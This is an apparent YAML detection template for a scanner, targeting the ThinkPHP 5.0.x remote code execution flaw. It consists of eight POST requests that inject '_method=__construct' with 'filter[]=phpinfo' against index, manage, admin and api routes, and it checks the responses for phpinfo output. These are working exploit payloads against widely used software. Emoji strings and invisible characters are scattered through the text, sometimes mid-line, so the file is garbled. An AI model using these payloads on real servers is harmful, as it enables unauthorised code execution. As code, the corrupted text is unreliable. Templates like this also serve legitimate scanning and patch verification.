thinkphp-5010-rce漏洞

漏洞文件后缀名是.yaml
id: thinkphp-5010-rce

info:
  name: ThinkPHP 5.0.10 RCE👨🦱‌👚🗑🤐✍
  author: zan8in
  severity: critical
  description: ThinkPHP <= 5.0.13
  reference:
    - https://github.com/Lotus6/ThinkphpGUI/blob/main/ThinkphpGUI/src/main/java/exploit/

👨🦱‌🧢🖥🙃💪

rules:
  r0:
    request:
      method: POST🧑‍🎤‍💎📠😡🦷
      path: /?s=index
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r1:🧑‍⚕️‍🪖🏮😈👈
    request:
      method: POST
      path: /?s=manage
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
🤌🏦🍼🅰🦕‍    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r2:
    request:
      method: POST
      path: /?s=admin
👌🏝🍏🚷🐙‍      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r3:
    request:

👨🦱‎🧣🏮🤖✋

      method: POST
      path: /?s=api
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)

🧑‍🍳‍👠🖌🤔🖐

  r4:
    request:
      method: POST
      path: /?s=index
      body: |
🦴🚠🍭🚭🐡‏        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r5:
    request:
      method: POST👨‍🚒‎🎩📡🤬👌
      path: /?s=manage
      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r6:
👂⛴🍟♂🦄‎    request:
      method: POST
      path: /?s=admin
      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1🧑‍⚕️‌👔🏮😇💪
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r7:
    request:
      method: POST
      path: /?s=api

🧑‍🚀‌👠🩸🙂✊

      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()|| r7()